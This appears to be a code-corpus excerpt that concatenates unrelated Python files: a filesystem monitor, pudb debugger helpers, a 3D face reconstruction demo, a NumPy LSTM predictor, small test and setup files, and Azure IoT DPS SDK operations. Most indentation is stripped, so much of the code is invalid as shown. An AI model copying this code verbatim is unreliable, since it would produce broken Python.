with self.__lock:
return list(self.__dir_watches) + list(self.__file_watches)
def add_dir_watch(self, path, flags=FSEvent.All, user=None):
watch = FSMonitorDirWatch(path, flags, user)
with self.__lock:
self.__dir_watches.add(watch)
return watch
def add_file_watch(self, path, flags=FSEvent.All, user=None):
watch = FSMonitorFileWatch(path, flags, user)
with self.__lock:
self.__file_watches.add(watch)
return watch
def remove_watch(self, watch):
with self.__lock:
if watch in self.__dir_watches:
self.__dir_watches.discard(watch)
elif watch in self.__file_watches:
self.__file_watches.discard(watch)
def remove_all_watches(self):
with self.__lock:
self.__dir_watches.clear()
self.__file_watches.clear()
def enable_watch(self, watch, enable=True):
watch.enabled = enable
def disable_watch(self, watch):
watch.enabled = False
def read_events(self, timeout=None):
now = start_time = time.time()
watches = self.watches
watches.sort(key=lambda watch: abs(now - watch._timestamp), reverse=True)
events = []
for watch in watches:
now = time.time()
if watch._timestamp < now:
tdiff = now - watch._timestamp
if tdiff < self.polling_interval:
time.sleep(self.polling_interval - tdiff)
watch._timestamp = now
if not watch.enabled:
continue
before = round_fs_resolution(time.time())
try:
new_state = watch.new_state(watch.path)
except OSError as e:
if e.errno == errno.ENOENT:
if not watch._deleted:
del watch.state
events.append(FSEvent(watch, FSEvent.DeleteSelf))
else:
if isinstance(watch, FSMonitorDirWatch):
_compare_contents(watch, new_state, events, before)
elif isinstance(watch, FSMonitorFileWatch):
_compare_stat(watch, new_state, events, before,
watch.state, watch.path)
watch.state = new_state
return events
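
# Hedged usage sketch, not part of the original library: poll a directory a few
# times with the FSMonitor defined above and print whatever events it reports.
# The "/tmp" default path is only an example.
def _example_poll_directory(path="/tmp", iterations=3):
    monitor = FSMonitor()
    monitor.add_dir_watch(path)
    for _ in range(iterations):
        for event in monitor.read_events():
            print(event)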
| StarcoderdataPython |
3369937 | <reponame>albfan/pudb
from __future__ import absolute_import, division, print_function
from pudb.py3compat import PY3
# {{{ breakpoint validity
def generate_executable_lines_for_code(code):
l = code.co_firstlineno
yield l
if PY3:
for c in code.co_lnotab[1::2]:
l += c
yield l
else:
for c in code.co_lnotab[1::2]:
l += ord(c)
yield l
def get_executable_lines_for_file(filename):
# inspired by rpdb2
from linecache import getlines
codes = [compile("".join(getlines(filename)), filename, "exec")]
from types import CodeType
execable_lines = set()
while codes:
code = codes.pop()
execable_lines |= set(generate_executable_lines_for_code(code))
codes.extend(const
for const in code.co_consts
if isinstance(const, CodeType))
return execable_lines
def get_breakpoint_invalid_reason(filename, lineno):
# simple logic stolen from pdb
import linecache
line = linecache.getline(filename, lineno)
if not line:
return "Line is beyond end of file."
try:
executable_lines = get_executable_lines_for_file(filename)
except SyntaxError:
return "File failed to compile."
if lineno not in executable_lines:
return "No executable statement found in line."
def lookup_module(filename):
"""Helper function for break/clear parsing -- may be overridden.
lookupmodule() translates (possibly incomplete) file or module name
into an absolute file name.
"""
# stolen from pdb
import os
import sys
if os.path.isabs(filename) and os.path.exists(filename):
return filename
f = os.path.join(sys.path[0], filename)
if os.path.exists(f): # and self.canonic(f) == self.mainpyfile:
return f
root, ext = os.path.splitext(filename)
if ext == '':
filename = filename + '.py'
if os.path.isabs(filename):
return filename
for dirname in sys.path:
while os.path.islink(dirname):
dirname = os.readlink(dirname)
fullname = os.path.join(dirname, filename)
if os.path.exists(fullname):
return fullname
return None
# }}}
# {{{ file encoding detection
# stolen from Python 3.1's tokenize.py, by <NAME>
import re
cookie_re = re.compile(r"^\s*#.*coding[:=]\s*([-\w.]+)")
from codecs import lookup, BOM_UTF8
if PY3:
BOM_UTF8 = BOM_UTF8.decode()
def detect_encoding(readline):
"""
The detect_encoding() function is used to detect the encoding that should
    be used to decode a Python source file. It requires one argument, readline,
in the same way as the tokenize() generator.
It will call readline a maximum of twice, and return the encoding used
(as a string) and a list of any lines (left as bytes) it has read
in.
It detects the encoding from the presence of a utf-8 bom or an encoding
cookie as specified in pep-0263. If both a bom and a cookie are present,
but disagree, a SyntaxError will be raised. If the encoding cookie is an
invalid charset, raise a SyntaxError.
If no encoding is specified, then the default of 'utf-8' will be returned.
"""
bom_found = False
encoding = None
def read_or_stop():
try:
return readline()
except StopIteration:
return ''
def find_cookie(line):
try:
if PY3:
line_string = line
else:
line_string = line.decode('ascii')
except UnicodeDecodeError:
return None
matches = cookie_re.findall(line_string)
if not matches:
return None
encoding = matches[0]
try:
codec = lookup(encoding)
except LookupError:
# This behaviour mimics the Python interpreter
raise SyntaxError("unknown encoding: " + encoding)
if bom_found and codec.name != 'utf-8':
# This behaviour mimics the Python interpreter
raise SyntaxError('encoding problem: utf-8')
return encoding
first = read_or_stop()
if first.startswith(BOM_UTF8):
bom_found = True
first = first[3:]
if not first:
return 'utf-8', []
encoding = find_cookie(first)
if encoding:
return encoding, [first]
second = read_or_stop()
if not second:
return 'utf-8', [first]
encoding = find_cookie(second)
if encoding:
return encoding, [first, second]
return 'utf-8', [first, second]
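
# Hedged usage sketch, not part of the original pudb source: feed detect_encoding
# the readline of an in-memory source buffer carrying a pep-0263 cookie. Assumes
# Python 3, where this implementation reads text lines.
def _detect_encoding_example():
    import io
    readline = io.StringIO("# -*- coding: latin-1 -*-\nx = 1\n").readline
    encoding, lines_read = detect_encoding(readline)
    return encoding  # expected: 'latin-1'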
# }}}
# {{{ traceback formatting
class StringExceptionValueWrapper:
def __init__(self, string_val):
self.string_val = string_val
def __str__(self):
return self.string_val
__context__ = None
__cause__ = None
def format_exception(exc_tuple):
# Work around http://bugs.python.org/issue17413
# See also https://github.com/inducer/pudb/issues/61
from traceback import format_exception
if PY3:
exc_type, exc_value, exc_tb = exc_tuple
if isinstance(exc_value, str):
exc_value = StringExceptionValueWrapper(exc_value)
exc_tuple = exc_type, exc_value, exc_tb
return format_exception(
*exc_tuple,
**dict(chain=hasattr(exc_value, "__context__")))
else:
return format_exception(*exc_tuple)
# }}}
# vim: foldmethod=marker
| StarcoderdataPython |
69336 | import tensorflow as tf
import numpy as np
from PIL import Image
import os
import glob
import platform
import argparse
from scipy.io import loadmat,savemat
from preprocess_img import align_img
from utils import *
from face_decoder import Face3D
from options import Option
is_windows = True
def parse_args():
desc = "Deep3DFaceReconstruction"
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('--pretrain_weights', type=str, default=None, help='path for pre-trained model')
    parser.add_argument('--use_pb', type=int, default=1, help='use the frozen .pb graph (1) or restore from .ckpt weights (0)')
return parser.parse_args()
def restore_weights(sess,opt):
var_list = tf.trainable_variables()
g_list = tf.global_variables()
# add batch normalization params into trainable variables
bn_moving_vars = [g for g in g_list if 'moving_mean' in g.name]
bn_moving_vars += [g for g in g_list if 'moving_variance' in g.name]
var_list +=bn_moving_vars
# create saver to save and restore weights
saver = tf.train.Saver(var_list = var_list)
saver.restore(sess,opt.pretrain_weights)
"""
Files in the input directory are arranged as
Folder1
Folder1_A0
Folder1_A1
Folder1_A2
....
Folder2
Folder2_A0
Folder2_A1
Folder2_A2
...
Folder3
Folder3_A0
Folder3_A1
Folder3_A2
...
"""
def demo():
# input and output folder
args = parse_args()
image_path = 'input'
save_path = 'output'
if not os.path.exists(save_path):
os.makedirs(save_path)
folder_list = glob.glob(image_path)
# img_list = glob.glob(image_path + '/' + '*.png')
# img_list +=glob.glob(image_path + '/' + '*.jpg')
# read BFM face model
# transfer original BFM model to our model
if not os.path.isfile('./BFM/BFM_model_front.mat'):
transferBFM09()
# read standard landmarks for preprocessing images
lm3D = load_lm3d()
n = 0
# build reconstruction model
with tf.Graph().as_default() as graph,tf.device('/cpu:0'):
opt = Option(is_train=False)
opt.batch_size = 1
opt.pretrain_weights = args.pretrain_weights
FaceReconstructor = Face3D()
images = tf.placeholder(name = 'input_imgs', shape = [opt.batch_size,224,224,3], dtype = tf.float32)
if args.use_pb and os.path.isfile('network/FaceReconModel.pb'):
print('Using pre-trained .pb file.')
graph_def = load_graph('network/FaceReconModel.pb')
tf.import_graph_def(graph_def,name='resnet',input_map={'input_imgs:0': images})
# output coefficients of R-Net (dim = 257)
coeff = graph.get_tensor_by_name('resnet/coeff:0')
else:
print('Using pre-trained .ckpt file: %s'%opt.pretrain_weights)
import networks
coeff = networks.R_Net(images,is_training=False)
# reconstructing faces
FaceReconstructor.Reconstruction_Block(coeff,opt)
face_shape = FaceReconstructor.face_shape_t
face_texture = FaceReconstructor.face_texture
face_color = FaceReconstructor.face_color
landmarks_2d = FaceReconstructor.landmark_p
recon_img = FaceReconstructor.render_imgs
tri = FaceReconstructor.facemodel.face_buf
with tf.Session() as sess:
if not args.use_pb :
restore_weights(sess,opt)
print('reconstructing...')
for folder in folder_list:
img_list = glob.glob(folder+"/*")
os.mkdir(folder.replace("input","output"))
save_path = folder.replace("input","output")
for file in img_list:
n += 1
print(n)
# load images and corresponding 5 facial landmarks
lm_file =file.replace('JPG','txt')
if(not os.path.isfile(lm_file)):
continue
img,lm = load_img(file,lm_file)
# preprocess input image
input_img,lm_new,transform_params = align_img(img,lm,lm3D)
coeff_,face_shape_,face_texture_,face_color_,landmarks_2d_,recon_img_,tri_ = sess.run([coeff,\
face_shape,face_texture,face_color,landmarks_2d,recon_img,tri],feed_dict = {images: input_img})
# reshape outputs
input_img = np.squeeze(input_img)
face_shape_ = np.squeeze(face_shape_, (0))
face_texture_ = np.squeeze(face_texture_, (0))
face_color_ = np.squeeze(face_color_, (0))
landmarks_2d_ = np.squeeze(landmarks_2d_, (0))
if not is_windows:
recon_img_ = np.squeeze(recon_img_, (0))
# save output files
# if not is_windows:
# savemat(os.path.join(save_path,file.split(os.path.sep)[-1].replace('.png','.mat').replace('jpg','mat')),{'cropped_img':input_img[:,:,::-1],'recon_img':recon_img_,'coeff':coeff_,\
# 'face_shape':face_shape_,'face_texture':face_texture_,'face_color':face_color_,'lm_68p':landmarks_2d_,'lm_5p':lm_new})
save_obj(file.replace('.JPG','_mesh.obj'),face_shape_,tri_,np.clip(face_color_,0,255)/255) # 3D reconstruction face (in canonical view)
if __name__ == '__main__':
demo()
| StarcoderdataPython |
3378945 | from __future__ import print_function
import numpy as np
import time
import data_util
weight_names = ["w_in", "b_in", "w_out", "b_out",
"rnn/multi_rnn_cell/cell_0/basic_lstm_cell/weights",
"rnn/multi_rnn_cell/cell_0/basic_lstm_cell/biases",
"rnn/multi_rnn_cell/cell_1/basic_lstm_cell/weights",
"rnn/multi_rnn_cell/cell_1/basic_lstm_cell/biases"]
"""
w_in 9,32
b_in 32
rnn/multi_rnn_cell/cell_0/basic_lstm_cell/weights 64,128
rnn/multi_rnn_cell/cell_0/basic_lstm_cell/biases 128
rnn/multi_rnn_cell/cell_1/basic_lstm_cell/weights 64,128
rnn/multi_rnn_cell/cell_1/basic_lstm_cell/biases 128
w_out 32,6
b_out 6
"""
weights = {}
for name in weight_names:
var_file_name = "data/{}.csv".format(name.replace("/", "_"))
weights[name] = np.loadtxt(var_file_name, delimiter=",")
# print("{}: {}".format(name, weights[name]))
def sigmoid(x_): return 1 / (1 + np.exp(-x_))
def calc_cell_one_step(in_, c_, h_, l):
# print("h:\n{}".format(h))
# print("x_step:\n{}".format(x_step))
concat = np.concatenate([in_, h_], 1) \
.dot(weights["rnn/multi_rnn_cell/cell_{}/basic_lstm_cell/weights".format(l)]) \
+ weights["rnn/multi_rnn_cell/cell_{}/basic_lstm_cell/biases".format(l)]
# print("concat:{}".format(concat.shape))
i, j, f, o = np.split(concat, 4, axis=1)
# print("i:{}, j:{}, f:{}, o:{}".format(i.shape, j.shape, f.shape, o.shape))
new_c = (c_ * sigmoid(f + 1) + sigmoid(i) * np.tanh(j))
new_h = np.tanh(new_c) * sigmoid(o)
return new_c, new_h
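
# Hedged illustration, not part of the original script: one LSTM cell step on
# random inputs with the shapes listed in the comment block above (hidden size 32),
# assuming the weights dictionary was loaded from the CSV files at import time.
def _example_single_cell_step(hidden_unit=32):
    in_ = np.random.randn(1, hidden_unit)
    c0 = np.zeros((1, hidden_unit))
    h0 = np.zeros((1, hidden_unit))
    c1, h1 = calc_cell_one_step(in_, c0, h0, 0)
    return c1.shape, h1.shape  # both (1, hidden_unit)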
def predict(x_):
inputs = np.maximum(np.dot(x_, weights["w_in"]) + weights["b_in"], 0)
# np.savetxt("data/inputs_np.log", inputs, '%.8e')
hidden_unit = len(weights["b_in"])
inputs = np.split(inputs, time_steps, 0)
outputs = []
for layer in range(layer_size):
c = np.zeros((1, hidden_unit))
h = np.zeros((1, hidden_unit))
for step in range(time_steps):
input_ = inputs[step]
c, h = calc_cell_one_step(input_, c, h, layer)
inputs[step] = h
outputs.append(h)
out_prob = np.dot(outputs[-1], weights["w_out"]) + weights["b_out"]
# print("out_prob: {}".format(out_prob))
with open("data/label_prob_np.log", "a") as f:
np.savetxt(f, out_prob, '%.8e')
return np.argmax(out_prob) + 1
# np.savetxt("data/labels_np.log", labels_predicted, fmt="%d")
if __name__ == "__main__":
start_time = time.time()
x_test, y_test = data_util.get_data("test")
time_steps = len(x_test[0])
input_dim = len(x_test[0][0])
layer_size = 2
sample_size = 100
p_start = time.time()
labels_predicted = [predict(x_test[i]) for i in range(sample_size)]
p_end = time.time()
print("prediction time: {}s".format(p_end - p_start))
labels = np.argmax(y_test, 1) + 1
print("label:\n{}\nY:\n{}".format(np.asarray(labels_predicted), labels))
print("accuracy: {}".format(np.sum(labels[np.arange(sample_size)] == np.asarray(labels_predicted))
* 1.0 * 100 / sample_size))
np.savetxt("data/labels_np.log", labels_predicted, fmt="%d")
print("Finished, takes {:6.4f} s".format(time.time() - start_time))
| StarcoderdataPython |
1714399 | # noqa
x = # Cause import error
| StarcoderdataPython |
26854 | <reponame>DarkSession/fd-api
# vim: textwidth=0 wrapmargin=0 tabstop=2 shiftwidth=2 softtabstop=2 smartindent smarttab
from setuptools import setup, find_namespace_packages
setup(
name="org.miggy",
packages=find_namespace_packages()
)
| StarcoderdataPython |
162569 | <filename>testing/test_homework_01/conftest.py
# from utils import add_homework_path
#
# add_homework_path(__file__)
| StarcoderdataPython |
194645 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, List, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._iot_dps_resource_operations import build_check_provisioning_service_name_availability_request, build_create_or_update_private_endpoint_connection_request_initial, build_create_or_update_request_initial, build_delete_private_endpoint_connection_request_initial, build_delete_request_initial, build_get_operation_result_request, build_get_private_endpoint_connection_request, build_get_private_link_resources_request, build_get_request, build_list_by_resource_group_request, build_list_by_subscription_request, build_list_keys_for_key_name_request, build_list_keys_request, build_list_private_endpoint_connections_request, build_list_private_link_resources_request, build_list_valid_skus_request, build_update_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class IotDpsResourceOperations:
"""IotDpsResourceOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.iothubprovisioningservices.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace_async
async def get(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
"""Get the non-security related metadata of the provisioning service.
Get the metadata of the provisioning service without SAS keys.
:param provisioning_service_name: Name of the provisioning service to retrieve.
:type provisioning_service_name: str
:param resource_group_name: Resource group name.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: ProvisioningServiceDescription, or the result of cls(response)
:rtype: ~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
error = self._deserialize.failsafe_deserialize(_models.ErrorDetails, pipeline_response)
raise HttpResponseError(response=response, model=error, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
async def _create_or_update_initial(
self,
resource_group_name: str,
provisioning_service_name: str,
iot_dps_description: "_models.ProvisioningServiceDescription",
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(iot_dps_description, 'ProvisioningServiceDescription')
request = build_create_or_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
content_type=content_type,
json=_json,
template_url=self._create_or_update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 201]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if response.status_code == 200:
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if response.status_code == 201:
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_create_or_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_create_or_update(
self,
resource_group_name: str,
provisioning_service_name: str,
iot_dps_description: "_models.ProvisioningServiceDescription",
**kwargs: Any
) -> AsyncLROPoller["_models.ProvisioningServiceDescription"]:
"""Create or update the metadata of the provisioning service.
Create or update the metadata of the provisioning service. The usual pattern to modify a
property is to retrieve the provisioning service metadata and security metadata, and then
combine them with the modified values in a new body to update the provisioning service.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to create or update.
:type provisioning_service_name: str
:param iot_dps_description: Description of the provisioning service to create or update.
:type iot_dps_description:
~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ProvisioningServiceDescription or
the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._create_or_update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
iot_dps_description=iot_dps_description,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_create_or_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
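
    async def _example_begin_create_or_update_usage(self, resource_group_name, provisioning_service_name, iot_dps_description):
        """Hedged usage sketch, not part of the generated SDK surface: start the
        long-running create/update defined above and wait for the final
        ProvisioningServiceDescription via the async poller."""
        poller = await self.begin_create_or_update(resource_group_name, provisioning_service_name, iot_dps_description)
        return await poller.result()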
async def _update_initial(
self,
resource_group_name: str,
provisioning_service_name: str,
provisioning_service_tags: "_models.TagsResource",
**kwargs: Any
) -> "_models.ProvisioningServiceDescription":
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
_json = self._serialize.body(provisioning_service_tags, 'TagsResource')
request = build_update_request_initial(
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
content_type=content_type,
json=_json,
template_url=self._update_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_update_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_update(
self,
resource_group_name: str,
provisioning_service_name: str,
provisioning_service_tags: "_models.TagsResource",
**kwargs: Any
) -> AsyncLROPoller["_models.ProvisioningServiceDescription"]:
"""Update an existing provisioning service's tags.
        Update an existing provisioning service's tags. To update other fields use the CreateOrUpdate
        method.
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:param provisioning_service_name: Name of provisioning service to create or update.
:type provisioning_service_name: str
:param provisioning_service_tags: Updated tag information to set into the provisioning service
instance.
:type provisioning_service_tags: ~azure.mgmt.iothubprovisioningservices.models.TagsResource
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either ProvisioningServiceDescription or
the result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescription]
:raises: ~azure.core.exceptions.HttpResponseError
"""
content_type = kwargs.pop('content_type', "application/json") # type: Optional[str]
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescription"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._update_initial(
resource_group_name=resource_group_name,
provisioning_service_name=provisioning_service_name,
provisioning_service_tags=provisioning_service_tags,
content_type=content_type,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('ProvisioningServiceDescription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_update.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
async def _delete_initial(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> None:
cls = kwargs.pop('cls', None) # type: ClsType[None]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
provisioning_service_name=provisioning_service_name,
subscription_id=self._config.subscription_id,
resource_group_name=resource_group_name,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204, 404]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
if cls:
return cls(pipeline_response, None, {})
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
provisioning_service_name: str,
resource_group_name: str,
**kwargs: Any
) -> AsyncLROPoller[None]:
"""Delete the Provisioning Service.
Deletes the Provisioning Service.
:param provisioning_service_name: Name of provisioning service to delete.
:type provisioning_service_name: str
:param resource_group_name: Resource group identifier.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.AsyncLROPoller[None]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
provisioning_service_name=provisioning_service_name,
resource_group_name=resource_group_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Devices/provisioningServices/{provisioningServiceName}'} # type: ignore
@distributed_trace
def list_by_subscription(
self,
**kwargs: Any
) -> AsyncIterable["_models.ProvisioningServiceDescriptionListResult"]:
"""Get all the provisioning services in a subscription.
List all the provisioning services for a given subscription id.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either ProvisioningServiceDescriptionListResult or the
result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.iothubprovisioningservices.models.ProvisioningServiceDescriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.ProvisioningServiceDescriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_by_subscription_request(
subscription_id=self._config.subscription_id,
template_url=self.list_by_subscription.metadata['url'],
